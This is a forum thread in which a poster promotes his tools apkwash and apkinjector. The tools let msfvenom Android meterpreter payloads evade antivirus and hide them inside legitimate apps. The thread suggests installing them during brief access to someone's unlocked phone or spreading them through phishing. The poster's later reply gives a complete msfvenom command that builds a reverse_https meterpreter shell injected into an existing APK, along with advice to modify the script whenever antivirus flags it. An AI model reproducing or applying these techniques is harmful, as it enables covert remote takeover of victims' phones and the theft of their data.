n33dsh3llz Posted February 22, 2017 Share Posted February 22, 2017 Hello everyone, This weekend I got a little bored and began toying with Android payloads to just toy with a meterpreter shell to see how it is. Upon doing so, I noticed the payload generated from msfvenom required I ignore my AV to install. So this sent me down a path to bypass antivirus, which come to find out WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone. Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way other than injecting the same AV bypassing payload into a legit app? Well, some people had example on how to do this online, but required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss so I allowed manual pieces for those special apps. The result was apkinjector, which with utilizing the apkwash technique of AV bypass is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files. Github: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector Quote Link to comment Share on other sites More sharing options...
unlinkable Posted March 4, 2017 Share Posted March 4, 2017 hi every time i'm trying to run scripts this message appear "An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali! Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue." i run apt-get update &apt-get upgrade before script i'm using kali Sana Quote Link to comment Share on other sites More sharing options...
n33dsh3llz Posted March 4, 2017 Author Share Posted March 4, 2017 (edited) 2 hours ago, unlinkable said: hi every time i'm trying to run scripts this message appear "An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali! Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue." i run apt-get update &apt-get upgrade before script i'm using kali Sana What is happening is the script is seeing PayloadTrustManager.smali in the pulled apart payload generated by MSFVenom. This payload has a signature I havent spent time avoiding by AVG. The quickest solution is to make sure you are completely updated. On Kali Rolling: apt-get dist-upgrade apt-get update apt-get upgrade Also, after spending a weekend throwing this together I realized the '-x' option on MSFVenom appears to get the job done as well for injecting into other payloads. So if wanting to do a phishing attack instead of using apkinjector you can use msfvenom with the apk to inject into followed by the -x option. Of course, the bash script is very similar to what msfvenom is doing so looking it over will give you an understanding on what is happening and if it is flagged by an AV you can simply modify the bash script to get around it. Edited March 4, 2017 by n33dsh3llz msfvenom -p android/meterpreter/reverse_https LPORT=XXXX LHOST=X.X.X.X -x original.apk -o payload.apk Quote Link to comment Share on other sites More sharing options...
n33dsh3llz Posted March 4, 2017 Author Share Posted March 4, 2017 You also want to make sure your sources.list has the repo. http://docs.kali.org/general-use/kali-linux-sources-list-repositories Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.